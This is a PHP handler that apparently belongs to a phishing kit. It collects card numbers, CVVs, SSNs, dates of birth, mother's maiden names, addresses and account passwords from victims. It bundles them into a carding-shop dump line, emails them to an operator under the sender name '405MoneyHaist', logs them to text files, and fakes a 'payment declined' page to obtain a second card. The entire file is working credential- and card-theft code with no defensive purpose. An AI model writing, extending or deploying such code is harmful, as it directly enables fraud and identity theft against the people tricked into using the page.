<?php ob_start(); error_reporting(E_ALL); ini_set('display_errors', 1);
// Safe session start
if (session_status() === PHP_SESSION_NONE) {
    @ini_set('session.save_path', sys_get_temp_dir());
    @session_start();
}
include '../setup/function.php';
$res = json_decode(file_get_contents('../../config/access.json'), true);

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header("HTTP/1.1 405 Method Not Allowed");
    exit;
}

$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);

function isMobileDevice() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    $mobileDevices = array(
        'Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'
    );

    foreach ($mobileDevices as $device) {
        if (stripos($userAgent, $device) !== false) {
            return true;
        }
    }
    return false;
}

$card = str_replace(' ', '', $_POST['ccnumber']);
$oldcc = str_replace(' ', '', $_SESSION['form_data']['ccnumber']);
if($card == $oldcc)
{
    $_SESSION['counting_submit'] += 1;
    if ($ipData) saveIpData($ipData, 'Human Try Submit Card '.$_SESSION['counting_submit']);
    if(isMobileDevice())
    {
        header("Location: mobile/payment-declined?ref=".generateRandomString(100));   
        ob_flush();
        exit();
    } else {
        header("Location: payment-declined?ref=".generateRandomString(100));
        ob_flush();
        exit();
    }
}

$formData = $_SESSION['form_data'] ?? [];

$cardname = $formData['first_name'] .' '.$formData['last_name'];
$cardNumber = str_replace(' ', '', $_POST['ccnumber']);

if (!is_numeric($cardNumber) || !luhn_check($cardNumber)) {
    header("HTTP/1.1 400 Bad Request");
    exit;
}

$expirationDate = $_POST['ccexp']; $expirationDate = str_replace('/', '|', $expirationDate);
$formatexpWebshop = explode('/', $_POST['ccexp']);
$cvv = $_POST['cvv'];
$cid = $_POST['amexcid'] ?? $_POST['cid'] ?? 'N/A';
$xid = $_POST['xid'] ?? 'N/A';

$bin = substr($cardNumber, 0, 6);
$formattedCardNumber = implode(' ', str_split($cardNumber, 4));

$formattedBin = $bin;

$cardDetails = getCardDetailsFromBIN($bin);
$issuer = strtoupper($cardDetails['issuer']);
$cardTier = strtoupper($cardDetails['card_tier']);
$scheme = strtoupper($cardDetails['scheme']);
$type = strtoupper($cardDetails['type']);

    $ispInfo = fetchIpData($ip, $userAgent);
    $cityGeo = $ispInfo['city'] ?? 'N/A';
    $region = $ispInfo['region'] ?? 'N/A';
    $country = $ispInfo['country'] ?? 'N/A';
    $isp = $ispInfo['isp'] ?? 'N/A';

$fullname = htmlspecialchars($formData['first_name'] .''. $formData['last_name'] ?? '');
$address = htmlspecialchars($formData['address'] ?? '');
$address2 = htmlspecialchars($formData['apt'] ?? '');
$city = htmlspecialchars($formData['city'] ?? '');
$state = htmlspecialchars($formData['state'] ?? '');
$zipcode = htmlspecialchars($formData['zip_code'] ?? '');
$phonenumber = htmlspecialchars($formData['phonenumber'] ?? '');
$cty = $country;
$sosel = htmlspecialchars($formData['ssn'] ?? '');
$dob = htmlspecialchars($formData['dob'] ?? '');
$mmn = htmlspecialchars($formData['mmn'] ?? '');
$email = htmlspecialchars($_SESSION['username'] ?? '');
$password = htmlspecialchars($_SESSION['password'] ?? '');

$deviceBrowser = getDeviceAndBrowser();
$device = $deviceBrowser['device'];
$browser = $deviceBrowser['browser'];
$userAgent = $deviceBrowser['user_agent'];

$dateTime = date("Y-m-d H:i:s");

$webshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";

$templateCard = str_replace("##EMAIL##", $email, $templateCard);
$templateCard = str_replace("##PASSWORD##", $password, $templateCard);
$templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
$templateCard = str_replace("##CNM##", $cardname, $templateCard);
$templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
$templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
$templateCard = str_replace("##CVV##", $cvv, $templateCard);
$templateCard = str_replace("##CID##", $cid, $templateCard);
$templateCard = str_replace("##XID##", $xid, $templateCard);
$templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
$templateCard = str_replace("##ADDRESS##", $address, $templateCard);
$templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
$templateCard = str_replace("##CTY##", $city, $templateCard);
$templateCard = str_replace("##STE##", $state, $templateCard);
$templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
$templateCard = str_replace("##PINN##", '', $templateCard);
$templateCard = str_replace("##ZC##", $zipcode, $templateCard);
$templateCard = str_replace("##MMN##", $mmn, $templateCard);
$templateCard = str_replace("##DOB##", $dob, $templateCard);
$templateCard = str_replace("##SSN##", $sosel, $templateCard);
$templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
$templateCard = str_replace("##DATE##", $dateTime, $templateCard);
$templateCard = str_replace("##DV##", $device, $templateCard);
$templateCard = str_replace("##BW##", $browser, $templateCard);
$templateCard = str_replace("##CY##", $cityGeo, $templateCard);
$templateCard = str_replace("##ST##", $region, $templateCard);
$templateCard = str_replace("##CT##", $country, $templateCard);
$templateCard = str_replace("##IP##", $ip, $templateCard);
$templateCard = str_replace("##UA##", $userAgent, $templateCard);

$subject = "Card 1 :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
// Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }

loginAndCardSave($ip, 'card.txt');
loginAndCardSave($ip, 'card2.txt'); // Card 2 log
saveDataCard($webshop);
cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
if ($ipData) saveIpData($ipData, 'Human Submit Card 2');

if(isMobileDevice())
{
    header("Location: mobile/completed?ref=".generateRandomString(100));   
    ob_flush();
        exit();
} else {
    header("Location: completed?ref=".generateRandomString(100));
    ob_flush();
        exit();
}

ob_flush();
exit;